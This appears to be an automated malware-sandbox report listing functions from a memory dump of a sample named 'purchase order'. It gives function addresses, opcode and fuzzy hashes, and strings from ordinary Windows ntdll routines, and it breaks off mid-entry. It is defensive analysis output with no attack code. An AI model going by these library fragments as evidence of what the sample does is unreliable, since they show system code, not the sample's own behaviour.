                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 26356e9dcc4384624a8dee7f5a98ee9ecd82d05006188b099fe61452ba8912de
                                                                                                              • Instruction ID: 028277e6a1129d2832a376b49666781de19394a62491e72093c85873cd780826
                                                                                                              • Opcode Fuzzy Hash: 26356e9dcc4384624a8dee7f5a98ee9ecd82d05006188b099fe61452ba8912de
                                                                                                              • Instruction Fuzzy Hash: F590023120140403D100715859487470049A7D0211F59E811A0425958DD69689516621
                                                                                                              Function 015A2CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6806df8f7382a015b50996c7f214db2f88faf6f85dddd06960bc04ed5d079573
                                                                                                              • Instruction ID: a33c1832af029fd5dad653f42d7745237a67b52f9da9d20dc7d43d1b232d52bf
                                                                                                              • Opcode Fuzzy Hash: 6806df8f7382a015b50996c7f214db2f88faf6f85dddd06960bc04ed5d079573
                                                                                                              • Instruction Fuzzy Hash: 4D90023120140402D100759858486860049A7E0311F59E411A5025955EC6A589916631
                                                                                                              Function 015A2F60 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48112dfcba5cd4ad3eca521cd1b6711c9961c88afda1c361331a632d085ea50e
                                                                                                              • Instruction ID: 4617b43a45142a67526f596eb042f6352da202ccfe7cf6504a0c14e3eb625d7f
                                                                                                              • Opcode Fuzzy Hash: 48112dfcba5cd4ad3eca521cd1b6711c9961c88afda1c361331a632d085ea50e
                                                                                                              • Instruction Fuzzy Hash: 1690026121140042D104715848447460089A7E1211F59D412A2155954CC5698D615625
                                                                                                              Function 015A2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 138e97d2aba6a13f990257da86790de2b4b0cbbd6ea6741faa3d06b1b9b2bc9c
                                                                                                              • Instruction ID: bdeb105042c52ab0d5c654168413cdfc3933838184c5e35b12a25a6ede96c119
                                                                                                              • Opcode Fuzzy Hash: 138e97d2aba6a13f990257da86790de2b4b0cbbd6ea6741faa3d06b1b9b2bc9c
                                                                                                              • Instruction Fuzzy Hash: 9D90026134140442D10071584854B460049E7E1311F59D415E1065954DC659CD526626
                                                                                                              Function 015A2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b773697644be91a70782dbb113b1bd36c02b07e9322666100bba6734f3fec8ef
                                                                                                              • Instruction ID: 5a811c01e7d58f46da70875b20c35496e77c5f07c91c3a997749afee10e48547
                                                                                                              • Opcode Fuzzy Hash: b773697644be91a70782dbb113b1bd36c02b07e9322666100bba6734f3fec8ef
                                                                                                              • Instruction Fuzzy Hash: 9E900221211C0042D20075684C54B470049A7D0313F59D515A0155954CC95589615A21
                                                                                                              Function 015A2F90 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b4a6d75928e05666a82b91954c5d33c685947ff1976bc25f649585172711d06
                                                                                                              • Instruction ID: af8f38a807160148f940515950e5bafe26b7453d744d5194f45e3e71df395a51
                                                                                                              • Opcode Fuzzy Hash: 8b4a6d75928e05666a82b91954c5d33c685947ff1976bc25f649585172711d06
                                                                                                              • Instruction Fuzzy Hash: 8290023120180402D10071584C5474B0049A7D0312F59D411A1165955DC66589516A71
                                                                                                              Function 015A2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 06e19f64d43dd1e24f781e96825a8b771537afbd7d8c32b7c3d48f7850294bec
                                                                                                              • Instruction ID: f80efdd3bbaa20f32fed5b5ef9e6b1e2c7d7018d4269075a7bceae1b92c2c406
                                                                                                              • Opcode Fuzzy Hash: 06e19f64d43dd1e24f781e96825a8b771537afbd7d8c32b7c3d48f7850294bec
                                                                                                              • Instruction Fuzzy Hash: 3190022160140042414071688C849464049BBE1221759D521A0999950DC59989655B65
                                                                                                              Function 015A2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b82e16c4df64e498327403bc62b38a37afbce5a89c2023a65bd5b1a31ec2163
                                                                                                              • Instruction ID: 3c3092df504ba5c1bd55f762c841544a9378805b33a6274280dc6351ff8c3013
                                                                                                              • Opcode Fuzzy Hash: 3b82e16c4df64e498327403bc62b38a37afbce5a89c2023a65bd5b1a31ec2163
                                                                                                              • Instruction Fuzzy Hash: A390023120180402D10071584C487870049A7D0312F59D411A5165955EC6A5C9916A31
                                                                                                              Function 015A2E30 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 354b4ec8024fe4574c00399c32d27209298f155ee02c3332dde46db039cb9d34
                                                                                                              • Instruction ID: cd62597e71454c7943e8be4cc9d0df924523f0da23a562797075ae2214b77ce9
                                                                                                              • Opcode Fuzzy Hash: 354b4ec8024fe4574c00399c32d27209298f155ee02c3332dde46db039cb9d34
                                                                                                              • Instruction Fuzzy Hash: B890022130140402D10271584854646004DE7D1355F99D412E1425955DC6658A53A632
                                                                                                              Function 015A2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 881187a4344ddb9ec8b56efa98e62bf3b3d8c983569c284de9922ac7506927bf
                                                                                                              • Instruction ID: aa742268de911812b22c1a039fd22eb6efa98255934fc7e21a9d301f71ecf496
                                                                                                              • Opcode Fuzzy Hash: 881187a4344ddb9ec8b56efa98e62bf3b3d8c983569c284de9922ac7506927bf
                                                                                                              • Instruction Fuzzy Hash: 9C90026120180403D14075584C446470049A7D0312F59D411A2065955ECA698D516635
                                                                                                              Function 015A2E80 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 12399d8e731e6e94cf43576fe4f0d000b3e0cc98db83ad278ab88d040464282b
                                                                                                              • Instruction ID: c72c05356aab21fd91da1bd0b9ab3814ca427c107dad00fd67f44e39a467a899
                                                                                                              • Opcode Fuzzy Hash: 12399d8e731e6e94cf43576fe4f0d000b3e0cc98db83ad278ab88d040464282b
                                                                                                              • Instruction Fuzzy Hash: 8F90022160140502D10171584844656004EA7D0251F99D422A1025955ECA658A92A631
                                                                                                              Function 015A2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5db9979486344700662fb5776df916b7e81d2e1dca0d3209b37008ea24ba4d20
                                                                                                              • Instruction ID: 93d63cc7d4d794dab7c1e30eee2fbafee6aba75d3740c89b00aef3b553913f99
                                                                                                              • Opcode Fuzzy Hash: 5db9979486344700662fb5776df916b7e81d2e1dca0d3209b37008ea24ba4d20
                                                                                                              • Instruction Fuzzy Hash: 8090027120140402D140715848447860049A7D0311F59D411A5065954EC6998ED56B65
                                                                                                              Function 015A3010 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 78a178654d274b5eea23fc9955546b6320b632939e73d43ca0d3d30b16562a00
                                                                                                              • Instruction ID: fe75649adf07ffb2e00a6ff2a9cf58fb55c6e74ef53634e894939d497606b662
                                                                                                              • Opcode Fuzzy Hash: 78a178654d274b5eea23fc9955546b6320b632939e73d43ca0d3d30b16562a00
                                                                                                              • Instruction Fuzzy Hash: 1E90022120184442D14072584C44B4F4149A7E1212F99D419A4157954CC95589555B21
                                                                                                              Function 015A3090 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3a04fa23b26d28780cf731ac3a8d043182d9692b5edb934c3e1b25d2d6cb8eb
                                                                                                              • Instruction ID: 18a7df108884b100629fc1b2edf7d82a72cd36f374cd152d7ffebaafc55ad6f5
                                                                                                              • Opcode Fuzzy Hash: a3a04fa23b26d28780cf731ac3a8d043182d9692b5edb934c3e1b25d2d6cb8eb
                                                                                                              • Instruction Fuzzy Hash: 7D90022124140802D14071588854747004AE7D0611F59D411A0025954DC6568A656BB1
                                                                                                              Function 015A39B0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1712b1620290fb5a8d495fa5fd213ac2b6f3f3fac3e00ef4e7b520dd7d13f435
                                                                                                              • Instruction ID: fa8f071f30b359a6e4515de6e6587705a0c3ef5b6c0ad6f3c68d37e1815cf843
                                                                                                              • Opcode Fuzzy Hash: 1712b1620290fb5a8d495fa5fd213ac2b6f3f3fac3e00ef4e7b520dd7d13f435
                                                                                                              • Instruction Fuzzy Hash: 1E90022124545102D150715C48446564049B7E0211F59D421A0815994DC59589556721
                                                                                                              Function 015A3D70 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8a0215303b51d2beaffeef4ba6cf5cea289c59d930e2b00b4c46b3224fd3e450
                                                                                                              • Instruction ID: de19d4b5a95d7d9ac34ac9f1eeee787929a050734f54f2d590ec86cfb8fcb008
                                                                                                              • Opcode Fuzzy Hash: 8a0215303b51d2beaffeef4ba6cf5cea289c59d930e2b00b4c46b3224fd3e450
                                                                                                              • Instruction Fuzzy Hash: E190023520140402D51071585C44686008AA7D0311F59E811A0425958DC69489A1A621
                                                                                                              Function 015A3D10 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aef92f32e46a7ef444b272305107396a1c379e567e66ea0ece7ab8cc2c7c92f5
                                                                                                              • Instruction ID: 6324b6ac1ec0daf86d994952db7fe92037a6ee29ed80744c3e1d9b379d09e6b6
                                                                                                              • Opcode Fuzzy Hash: aef92f32e46a7ef444b272305107396a1c379e567e66ea0ece7ab8cc2c7c92f5
                                                                                                              • Instruction Fuzzy Hash: C390023120240142954072585C44A8E4149A7E1312B99E815A0016954CC95489615721
                                                                                                              Function 015A2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction ID: c95e441e6e187c0effe3ebaf6fe3fe5d65784a0af85680fa48b23376aed0396d
                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Function 015A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 234123a0ae4bcd93c9a51f7d93df067bba5cb610564baa6194bf9828db148dc5
                                                                                                              • Instruction ID: cdd2e0c0200472077c9a476eb8c48c00ccca4f4fb77c906bd84eb65a259693ec
                                                                                                              • Opcode Fuzzy Hash: 234123a0ae4bcd93c9a51f7d93df067bba5cb610564baa6194bf9828db148dc5
                                                                                                              • Instruction Fuzzy Hash: 9C51D7B2A40217BFCB21DB9C89D197FFBF8BB48640B948569F455DB641D334DE408BA0
                                                                                                              Function 01612410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 2d4485e12083fbae3736f4b7b04aace1eb1a5259b88f47100afaf4bbfaa0d9ee
                                                                                                              • Instruction ID: 6b83b760a155371a1152355d108eb8fb13b1b9f4aa8fca1a74cdd01cdbe01a4d
                                                                                                              • Opcode Fuzzy Hash: 2d4485e12083fbae3736f4b7b04aace1eb1a5259b88f47100afaf4bbfaa0d9ee
                                                                                                              • Instruction Fuzzy Hash: 19510771A00646AECB34DF9DCCE097FBBF9EB44200B28845EE496C7686E774DA408760
                                                                                                              Function 01597630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015D4725
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015D4742
                                                                                                              • ExecuteOptions, xrefs: 015D46A0
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 015D4787
                                                                                                              • Execute=1, xrefs: 015D4713
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015D46FC
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015D4655
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 256fb040dcad60ddc8c220dbb119c36bdbcb087f0937f7dac8f6add4fa93ff59
                                                                                                              • Instruction ID: c837e498859dbf00a1277e57878a1ae93e884cb1c002d7497d0627bc430e4564
                                                                                                              • Opcode Fuzzy Hash: 256fb040dcad60ddc8c220dbb119c36bdbcb087f0937f7dac8f6add4fa93ff59
                                                                                                              • Instruction Fuzzy Hash: C0512C3165021A7BEF21EFA8DC85FAD77A8FF58304F44049AD605AF181EB70AA41CF95
                                                                                                              Function 015AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction ID: 001b5fa3a2ff7c2b7c916b195b73fa923b0bd93a3a4fd5a86dae1eea8c082f91
                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction Fuzzy Hash: 7C81C170E8524A9EEF25CE6CC8517FEBFB1BF45320F984619D861AF291C77498408BD1
                                                                                                              Function 016120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 85d0548ad62addb4350d531c0ca4fc524c99000862dbe275fe7381c6fe74a36b
                                                                                                              • Instruction ID: 82058dbbf731dd5492ef4342422ad161cc25ef6f69515bfe13d74f7748a2ed06
                                                                                                              • Opcode Fuzzy Hash: 85d0548ad62addb4350d531c0ca4fc524c99000862dbe275fe7381c6fe74a36b
                                                                                                              • Instruction Fuzzy Hash: 0B21957AE0011AABDB10DF79CC51AEEBBF8EF54741F58011AEA05E7204E730DA118BA0
                                                                                                              Function 0158F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 015D031E
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015D02BD
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015D02E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: b52ed6ca530cb43f91a3db4ac1d0a355b4e6a565f860f4cfc2d01c1cac27526c
                                                                                                              • Instruction ID: d80d0e76ff7192bb0f336f8fa8ef02869a44a6bfc9ed12c5f15fe3141643ffb8
                                                                                                              • Opcode Fuzzy Hash: b52ed6ca530cb43f91a3db4ac1d0a355b4e6a565f860f4cfc2d01c1cac27526c
                                                                                                              • Instruction Fuzzy Hash: 0AE18B306047429FE725EF2CC884B2ABBE0BB88314F140A5AF5A5DF2E1D774D945CB52
                                                                                                              Function 0159BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 015D7BAC
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 015D7B7F
                                                                                                              • RTL: Resource at %p, xrefs: 015D7B8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 60451a21d6ea4f14d26da9934ddc433deb6fd55cac1fb240df4d38573c1cb407
                                                                                                              • Instruction ID: dd42d401fe329bcb76bf8aba0849165659c2c8b34ad18566198d2c566a32ce62
                                                                                                              • Opcode Fuzzy Hash: 60451a21d6ea4f14d26da9934ddc433deb6fd55cac1fb240df4d38573c1cb407
                                                                                                              • Instruction Fuzzy Hash: FF41D3317047039FEB25DE29D840F6AB7E5FB88710F100A1DE9669F680EB71E8058B92
                                                                                                              Function 0159B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D728C
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 015D72C1
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015D7294
                                                                                                              • RTL: Resource at %p, xrefs: 015D72A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: 5fdd1c9d9d2feedf0c5af9eb5afb0278aa72fb72f65216e1f54c6aa06e96b701
                                                                                                              • Instruction ID: a0a3a9965b6eac7efb7487b7d56353adcf8d8d41ee8a60f8bbd54093d738a4a1
                                                                                                              • Opcode Fuzzy Hash: 5fdd1c9d9d2feedf0c5af9eb5afb0278aa72fb72f65216e1f54c6aa06e96b701
                                                                                                              • Instruction Fuzzy Hash: B041CF31600243ABDB21DE29CC41F6AB7A6FB98714F100A19F959AF240DB21E85287D2
                                                                                                              Function 01612300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: bb205a0f56d3a79ee1aa909767287b0423a710073b7b138b57dc0a8aa564a713
                                                                                                              • Instruction ID: c91be12fdb1ed0cab4304f7a2f7c483d564fc71fe85df1b69a02ddd0821dc77e
                                                                                                              • Opcode Fuzzy Hash: bb205a0f56d3a79ee1aa909767287b0423a710073b7b138b57dc0a8aa564a713
                                                                                                              • Instruction Fuzzy Hash: 1431B672A002199FDB20DF2DCC50BEFB7F8FB44610F58045AE849E3244EB30EA548BA0
                                                                                                              Function 015A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
